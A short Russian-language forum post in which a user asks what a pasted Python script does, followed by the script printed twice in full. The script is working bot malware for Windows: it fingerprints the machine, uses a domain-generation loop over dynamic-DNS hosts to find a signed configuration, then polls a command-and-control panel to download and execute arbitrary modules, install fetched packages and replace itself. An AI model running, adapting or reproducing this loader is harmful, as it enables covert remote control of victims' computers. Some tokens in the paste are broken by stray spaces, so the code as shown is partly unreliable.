traceme
16.09.2015, 21:35
Подскажите пожалуйста что делает этот код
.SpoilerTarget" type="button">Spoiler
import ctypes
from ctypes import wintypes
import subprocess
from base64 import b64encode,b64decode
import threading
import traceback
import hashlib
import zipfile
import urllib2
import inspect
import urllib
import socket
import shutil
import ctypes
import random
import _winreg as winreg
import types
import json
import time
import rsa
import sys
import re
import os
_CreateMutex=ctypes.windll.kernel32.CreateMutexA
_CreateMutex.argtypes=[wintypes.LPCVOID,wintypes.BOOL,wintypes.LPCSTR]
_CreateMutex.restype=wintypes.HANDLE
_GetLastError=ctypes.windll.kernel32.GetLastError
_GetLastError.argtypes=[]
_GetLastError.restype=wintypes.HANDLE
class singleinstance:
def __init__(self):self.mutexname='multivar_{D0E858DF-985E-4907-B7FB-8D732C3FC3B9}';self.mutex=_CreateMutex(None,False, self.mutexname);self.lasterror=_GetLastError()
def aleradyrunning(self):return self.lasterror==183
def __del__(self):
if self.mutex:_CloseHandle(self.mutex)
def chk_mutex():
mutex=singleinstance();time.sleep(1)
if mutex.aleradyrunning():sys.exit()
class Http:
def __init__(self,proxy=False,cookie_support=False,ua= False):
self.handlers=set()
if proxy:self.handlers|=set([urllib2.ProxyHandler({'http':proxy}),urllib2.HTTPB asicAuthHandler()])
if cookie_support:self.handlers|=set([urllib2.HTTPCookieProcessor()])
if self.handlers:self.interface=urllib2.build_opener( *self.handlers)
else:self.interface=urllib2.build_opener(urllib2.B aseHandler)
urllib2.install_opener(self.interface)
if not ua:ua='Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'
self.interface.addheaders=[('User-agent',ua)]
def prepare_request(self,url,post=False,referer=False) :
request=urllib2.Request(url)
if referer:request.add_header('Referer',referer)
return request
class Web:
def __init__(self,proxy=False,cookie_support=False,ua= False,timeout=60):self.timeout=timeout;self.web=Ht tp(proxy,cookie_support,ua)
def fetch(self,url,data=False,referer=False):
request=self.web.prepare_request(url,referer)
if data:data=urllib.urlencode(data);response=self.web .interface.open(request,data,timeout=self.timeout)
else:response=self.web.interface.open(request,time out=self.timeout)
return response
class requests:
class texter:
def __init__(self,text):self.text=text
@staticmethod
def post(url,data=False,proxies=False,headers=False):
if not proxies:proxies={'http':False}
if not headers:headers={'User-Agent':False}
resp=Web(proxy=proxies['http'],ua=headers['User-Agent']).fetch(url,data);return requests.texter(resp.read())
@staticmethod
def get(url,proxies=False,headers=False):return requests.post(url,proxies=proxies,headers=headers)
def file_put_contents(fname,data):
with open(fname,'wb') as f:f.write(data)
def file_get_contents(fname):
with open(fname,'rb') as f:return f.read()
def extract_text(text,tag1,tag2):
match=re.search('{}(.*?){}'.format(tag1,tag2),text ,re.M|re.S)
if match is None:return ''
return match.group(1)
def get_hard_id():
try:k=winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE,'SO FTWARE\\Microsoft\\Cryptography');return winreg.QueryValueEx(k,'MachineGuid')[0].lower()
except Exception as e:print(e);return os.popen('vol '+'c:','r').read().split()[-1].lower()
def set_cur_dir(name):os.chdir(name)
def get_script_dir():return os.path.dirname(os.path.realpath(__file__))
def get_pseudo():
alpha='qwertyuiopasdfghjklzxcvbnm1234567890';pseud o=''
for i in range(9):pseudo=pseudo+random.choice(alpha)
return pseudo
def chk_sign(text):
result=False
try:public_data='LS0tLS1CRUdJTiBSU0EgUFVCTElDIEtFW S0tLS0tCk1JSUJDZ0tDQVFFQXZPbTlNeHg4RG5VbHZWNHdCOW9 3NUlPa3BNTzN1R2ZqTDE2aXlzdFRSVGMwQ3NQU2lFR00KMEJCU VlqY0wzSStORE9tMjhxLzBVWGVsMHFwdmtGQ0N6Y0FUVXJsOVl vUHpzbkpURnBGaUdYclArTi9IQzczZgpKV1pERWJCUW84L0ZVb 1MvWW1oVTFXbkFjMzhVNUg1eFhqY0J0SkhWOHhmT0tmL2V5S1h KdmlFU0h6VHBVa2pTClJ6TDVTb2ZwZ3p0VU00cWc0NGFBOEF6b lJSazlpcmp3VjErVHRhRzRQOXpFZ2JoZThOM0grOS9rT2pCK1d YOE8KNHlUbDhPdUVuNEV4Yy9TdysxcmFaL2x3QnFsUWlGdDFEU k05U2ZpU2lrNkJoSndBUnVpbmk0R3RjV3h3UDdROQpiM1dKL1J RdUZxQ0hSMVkzN0F0YlVLc1NzQjV5b0hyTDJRSURBUUFCCi0tL S0tRU5EIFJTQSBQVUJMSUMgS0VZLS0tLS0K';public_data=b 64decode(public_data);pubkey=rsa.PublicKey.load_pk cs1(public_data.encode());sign=extract_text(text,' ','');sign=sign.decode('hex');data=extract_text(te xt,'','');data=b64decode(data);result=rsa.verify(d ata,sign,pubkey)
except Exception as e:result=False
return result
def wait_for_internet():
is_internet=False
while not is_internet:
try:sock=socket.create_connection(('google.com',80 ),timeout=30);is_internet=True;sock.close()
except Exception as e:print(e);time.sleep(2)
def import_code(code,name):module=types.ModuleType(nam e);exec(code,module.__dict__);return module
def get_serv_data():
random.seed(538479483);domains=['.net','.ru','.com','.in.ua','.ucoz.com','.ucoz.ne t','.ucoz.org','.ucoz.ru','.ucoz.ua','.ucoz.co.uk' ,'.at.ua','.3dn.ru','.my1.ru','.clan.su','.moy.su' ,'.do.am','.narod.ru','.3utilities.com','.bounceme .net','.ddns.net','.ddnsking.com','.gotdns.ch','.h opto.org','.myftp.biz','.myftp.org','.myvnc.com',' .no-ip.biz','.no-ip.info','.no-ip.org','.noip.me','.redirectme.net','.servebeer.c om','.serveblog.net','.servecounterstrike.com','.s erveftp.com','.servegame.com','.servehalflife.com' ,'.servehttp.com','.serveminecraft.net','.servemp3 .com','.servepics.com','.servequake.com','.sytes.n et','.webhop.me','.zapto.org'];wait_for_internet();rsa_config='';loop=True;itera tor=0
while loop:
sub_domain=get_pseudo()
for e in domains:
domain=sub_domain+e;url='http://%s/%s.txt'%(domain,sub_domain);print('check url %s'%url);time.sleep(.1);text=do_request(url,domain )
if chk_sign(text):rsa_config=text;loop=False;break
iterator+=1
if iterator>=100:iterator=0;random.seed(538479483)
time.sleep(2)
rsa_config=extract_text(text,'','');rsa_config=b64 decode(rsa_config);print(rsa_config);main_config=e xtract_text(rsa_config,'','');ip=extract_text(main _config,'','');host=extract_text(main_config,'','' );path=extract_text(main_config,'','');return rsa_config,ip,host,path
def do_request(url,ip,data=False):
try:
proxy={'http':ip}
if data:return requests.post(url,proxies=proxy,data=data).text
return requests.get(url,proxies=proxy).text
except Exception:return ''
alive_modules={}
def run_new_module(rsa_config,code,name):imported=impo rt_code(code,name);alive_modules[name]=imported;thread=threading.Thread(target=imported. payload,args=(alive_modules[name],rsa_config));thread.start();return thread
def stop_thread(module):alive_modules[module['name']].exit();module['thread'].join()
def setup_import(imp):
try:print(imp['name']);__import__(imp['name']);return
except Exception as e:print(str(e))
try:
zip_s=requests.get(imp['url']).text
with open(imp['name']+'.zip','wb') as f:f.write(zip_s)
try:shutil.rmtree(imp['name'])
except Exception as e:print(e)
with zipfile.ZipFile(imp['name']+'.zip','r') as myzip:myzip.extractall()
set_cur_dir(get_script_dir()+'\\'+imp['name']);os.popen('"'+sys.executable+'" '+'-X:FullFrames setup.py install');set_cur_dir(get_script_dir())
except Exception as e:return False
return True
def main():
time.sleep(10);chk_mutex();rsa_config='';set_cur_d ir(get_script_dir());bot_id=get_hard_id();print('j mscbcsrkvureutlepd',bot_id);rsa_config,adminka_ip, adminka_host,adminka_path=get_serv_data();loaded_m odules={}
while True:
post_data={}
for k in loaded_modules:post_data[k]=loaded_modules[k]['hash']
req_url='http://%s%s?h=%s&k=%s&do=get_modules'%(adminka_host,adminka_path,'jmscbc srkvureutlepd',bot_id);print(post_data);resp=do_re quest(req_url,adminka_ip,data={'modules':json.dump s(post_data)});sleep=extract_text(resp,'','')
if not sleep:sleep='7200'
exception_text=''
try:
modules_head=extract_text(resp,'','')
if modules_head:modules_head=json.loads(modules_head)
else:modules_head=[]
modules_codes=extract_text(resp,'','');update_code =extract_text(resp,'','')
if update_code:print('Updating..');cur_script=os.path .realpath(__file__);code=b64decode(update_code);fi le_put_contents(cur_script,code);print('run ',[sys.executable,cur_script]);subprocess.Popen([sys.executable,cur_script],creationflags=8);sys.exit()
for module in modules_head:
print(module['name'])
if module['name'] in loaded_modules:print('trying kill module '+module['name']);stop_thread(loaded_modules[module['name']]);loaded_modules.pop(module['name']);print('killed module '+module['name'])
print('update imports');imports_result=True
for imp in module['imports']:
if not setup_import(imp):exception_text=exception_text+"I can't install "+imp['name']+'\n';imports_result=False;continue
if not imports_result:continue
print('load module');module_code=extract_text(modules_codes,'' ,'');module_code=b64decode(module_code);module_thr ead=0
if module['load_mode']=='thread':print('load module as thread');module_thread=run_new_module(rsa_config,m odule_code,module['name'])
loaded_modules[module['name']]=module;loaded_modules[module['name']]['thread']=module_thread
except Exception as e:exception_text=exception_text+traceback.format_e xc()
if len(exception_text)!=0:
try:exception_text+='\n\n['+resp+']'
except Exception as e:pass
req_url='http://%s%s?h=%s&k=%s&do=traceback'%(adminka_host,adminka_path,'jmscbcsr kvureutlepd',bot_id);do_request(req_url,adminka_ip ,data={'trace':exception_text})
try:time.sleep(int(sleep))
except Exception as e:time.sleep(7200)
if __name__=='__main__':main()
.SpoilerTarget" type="button">Spoiler
import ctypes
from ctypes import wintypes
import subprocess
from base64 import b64encode,b64decode
import threading
import traceback
import hashlib
import zipfile
import urllib2
import inspect
import urllib
import socket
import shutil
import ctypes
import random
import _winreg as winreg
import types
import json
import time
import rsa
import sys
import re
import os
_CreateMutex=ctypes.windll.kernel32.CreateMutexA
_CreateMutex.argtypes=[wintypes.LPCVOID,wintypes.BOOL,wintypes.LPCSTR]
_CreateMutex.restype=wintypes.HANDLE
_GetLastError=ctypes.windll.kernel32.GetLastError
_GetLastError.argtypes=[]
_GetLastError.restype=wintypes.HANDLE
class singleinstance:
def __init__(self):self.mutexname='multivar_{D0E858DF-985E-4907-B7FB-8D732C3FC3B9}';self.mutex=_CreateMutex(None,False, self.mutexname);self.lasterror=_GetLastError()
def aleradyrunning(self):return self.lasterror==183
def __del__(self):
if self.mutex:_CloseHandle(self.mutex)
def chk_mutex():
mutex=singleinstance();time.sleep(1)
if mutex.aleradyrunning():sys.exit()
class Http:
def __init__(self,proxy=False,cookie_support=False,ua= False):
self.handlers=set()
if proxy:self.handlers|=set([urllib2.ProxyHandler({'http':proxy}),urllib2.HTTPB asicAuthHandler()])
if cookie_support:self.handlers|=set([urllib2.HTTPCookieProcessor()])
if self.handlers:self.interface=urllib2.build_opener( *self.handlers)
else:self.interface=urllib2.build_opener(urllib2.B aseHandler)
urllib2.install_opener(self.interface)
if not ua:ua='Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'
self.interface.addheaders=[('User-agent',ua)]
def prepare_request(self,url,post=False,referer=False) :
request=urllib2.Request(url)
if referer:request.add_header('Referer',referer)
return request
class Web:
def __init__(self,proxy=False,cookie_support=False,ua= False,timeout=60):self.timeout=timeout;self.web=Ht tp(proxy,cookie_support,ua)
def fetch(self,url,data=False,referer=False):
request=self.web.prepare_request(url,referer)
if data:data=urllib.urlencode(data);response=self.web .interface.open(request,data,timeout=self.timeout)
else:response=self.web.interface.open(request,time out=self.timeout)
return response
class requests:
class texter:
def __init__(self,text):self.text=text
@staticmethod
def post(url,data=False,proxies=False,headers=False):
if not proxies:proxies={'http':False}
if not headers:headers={'User-Agent':False}
resp=Web(proxy=proxies['http'],ua=headers['User-Agent']).fetch(url,data);return requests.texter(resp.read())
@staticmethod
def get(url,proxies=False,headers=False):return requests.post(url,proxies=proxies,headers=headers)
def file_put_contents(fname,data):
with open(fname,'wb') as f:f.write(data)
def file_get_contents(fname):
with open(fname,'rb') as f:return f.read()
def extract_text(text,tag1,tag2):
match=re.search('{}(.*?){}'.format(tag1,tag2),text ,re.M|re.S)
if match is None:return ''
return match.group(1)
def get_hard_id():
try:k=winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE,'SO FTWARE\\Microsoft\\Cryptography');return winreg.QueryValueEx(k,'MachineGuid')[0].lower()
except Exception as e:print(e);return os.popen('vol '+'c:','r').read().split()[-1].lower()
def set_cur_dir(name):os.chdir(name)
def get_script_dir():return os.path.dirname(os.path.realpath(__file__))
def get_pseudo():
alpha='qwertyuiopasdfghjklzxcvbnm1234567890';pseud o=''
for i in range(9):pseudo=pseudo+random.choice(alpha)
return pseudo
def chk_sign(text):
result=False
try:public_data='LS0tLS1CRUdJTiBSU0EgUFVCTElDIEtFW S0tLS0tCk1JSUJDZ0tDQVFFQXZPbTlNeHg4RG5VbHZWNHdCOW9 3NUlPa3BNTzN1R2ZqTDE2aXlzdFRSVGMwQ3NQU2lFR00KMEJCU VlqY0wzSStORE9tMjhxLzBVWGVsMHFwdmtGQ0N6Y0FUVXJsOVl vUHpzbkpURnBGaUdYclArTi9IQzczZgpKV1pERWJCUW84L0ZVb 1MvWW1oVTFXbkFjMzhVNUg1eFhqY0J0SkhWOHhmT0tmL2V5S1h KdmlFU0h6VHBVa2pTClJ6TDVTb2ZwZ3p0VU00cWc0NGFBOEF6b lJSazlpcmp3VjErVHRhRzRQOXpFZ2JoZThOM0grOS9rT2pCK1d YOE8KNHlUbDhPdUVuNEV4Yy9TdysxcmFaL2x3QnFsUWlGdDFEU k05U2ZpU2lrNkJoSndBUnVpbmk0R3RjV3h3UDdROQpiM1dKL1J RdUZxQ0hSMVkzN0F0YlVLc1NzQjV5b0hyTDJRSURBUUFCCi0tL S0tRU5EIFJTQSBQVUJMSUMgS0VZLS0tLS0K';public_data=b 64decode(public_data);pubkey=rsa.PublicKey.load_pk cs1(public_data.encode());sign=extract_text(text,' ','');sign=sign.decode('hex');data=extract_text(te xt,'','');data=b64decode(data);result=rsa.verify(d ata,sign,pubkey)
except Exception as e:result=False
return result
def wait_for_internet():
is_internet=False
while not is_internet:
try:sock=socket.create_connection(('google.com',80 ),timeout=30);is_internet=True;sock.close()
except Exception as e:print(e);time.sleep(2)
def import_code(code,name):module=types.ModuleType(nam e);exec(code,module.__dict__);return module
def get_serv_data():
random.seed(538479483);domains=['.net','.ru','.com','.in.ua','.ucoz.com','.ucoz.ne t','.ucoz.org','.ucoz.ru','.ucoz.ua','.ucoz.co.uk' ,'.at.ua','.3dn.ru','.my1.ru','.clan.su','.moy.su' ,'.do.am','.narod.ru','.3utilities.com','.bounceme .net','.ddns.net','.ddnsking.com','.gotdns.ch','.h opto.org','.myftp.biz','.myftp.org','.myvnc.com',' .no-ip.biz','.no-ip.info','.no-ip.org','.noip.me','.redirectme.net','.servebeer.c om','.serveblog.net','.servecounterstrike.com','.s erveftp.com','.servegame.com','.servehalflife.com' ,'.servehttp.com','.serveminecraft.net','.servemp3 .com','.servepics.com','.servequake.com','.sytes.n et','.webhop.me','.zapto.org'];wait_for_internet();rsa_config='';loop=True;itera tor=0
while loop:
sub_domain=get_pseudo()
for e in domains:
domain=sub_domain+e;url='http://%s/%s.txt'%(domain,sub_domain);print('check url %s'%url);time.sleep(.1);text=do_request(url,domain )
if chk_sign(text):rsa_config=text;loop=False;break
iterator+=1
if iterator>=100:iterator=0;random.seed(538479483)
time.sleep(2)
rsa_config=extract_text(text,'','');rsa_config=b64 decode(rsa_config);print(rsa_config);main_config=e xtract_text(rsa_config,'','');ip=extract_text(main _config,'','');host=extract_text(main_config,'','' );path=extract_text(main_config,'','');return rsa_config,ip,host,path
def do_request(url,ip,data=False):
try:
proxy={'http':ip}
if data:return requests.post(url,proxies=proxy,data=data).text
return requests.get(url,proxies=proxy).text
except Exception:return ''
alive_modules={}
def run_new_module(rsa_config,code,name):imported=impo rt_code(code,name);alive_modules[name]=imported;thread=threading.Thread(target=imported. payload,args=(alive_modules[name],rsa_config));thread.start();return thread
def stop_thread(module):alive_modules[module['name']].exit();module['thread'].join()
def setup_import(imp):
try:print(imp['name']);__import__(imp['name']);return
except Exception as e:print(str(e))
try:
zip_s=requests.get(imp['url']).text
with open(imp['name']+'.zip','wb') as f:f.write(zip_s)
try:shutil.rmtree(imp['name'])
except Exception as e:print(e)
with zipfile.ZipFile(imp['name']+'.zip','r') as myzip:myzip.extractall()
set_cur_dir(get_script_dir()+'\\'+imp['name']);os.popen('"'+sys.executable+'" '+'-X:FullFrames setup.py install');set_cur_dir(get_script_dir())
except Exception as e:return False
return True
def main():
time.sleep(10);chk_mutex();rsa_config='';set_cur_d ir(get_script_dir());bot_id=get_hard_id();print('j mscbcsrkvureutlepd',bot_id);rsa_config,adminka_ip, adminka_host,adminka_path=get_serv_data();loaded_m odules={}
while True:
post_data={}
for k in loaded_modules:post_data[k]=loaded_modules[k]['hash']
req_url='http://%s%s?h=%s&k=%s&do=get_modules'%(adminka_host,adminka_path,'jmscbc srkvureutlepd',bot_id);print(post_data);resp=do_re quest(req_url,adminka_ip,data={'modules':json.dump s(post_data)});sleep=extract_text(resp,'','')
if not sleep:sleep='7200'
exception_text=''
try:
modules_head=extract_text(resp,'','')
if modules_head:modules_head=json.loads(modules_head)
else:modules_head=[]
modules_codes=extract_text(resp,'','');update_code =extract_text(resp,'','')
if update_code:print('Updating..');cur_script=os.path .realpath(__file__);code=b64decode(update_code);fi le_put_contents(cur_script,code);print('run ',[sys.executable,cur_script]);subprocess.Popen([sys.executable,cur_script],creationflags=8);sys.exit()
for module in modules_head:
print(module['name'])
if module['name'] in loaded_modules:print('trying kill module '+module['name']);stop_thread(loaded_modules[module['name']]);loaded_modules.pop(module['name']);print('killed module '+module['name'])
print('update imports');imports_result=True
for imp in module['imports']:
if not setup_import(imp):exception_text=exception_text+"I can't install "+imp['name']+'\n';imports_result=False;continue
if not imports_result:continue
print('load module');module_code=extract_text(modules_codes,'' ,'');module_code=b64decode(module_code);module_thr ead=0
if module['load_mode']=='thread':print('load module as thread');module_thread=run_new_module(rsa_config,m odule_code,module['name'])
loaded_modules[module['name']]=module;loaded_modules[module['name']]['thread']=module_thread
except Exception as e:exception_text=exception_text+traceback.format_e xc()
if len(exception_text)!=0:
try:exception_text+='\n\n['+resp+']'
except Exception as e:pass
req_url='http://%s%s?h=%s&k=%s&do=traceback'%(adminka_host,adminka_path,'jmscbcsr kvureutlepd',bot_id);do_request(req_url,adminka_ip ,data={'trace':exception_text})
try:time.sleep(int(sleep))
except Exception as e:time.sleep(7200)
if __name__=='__main__':main()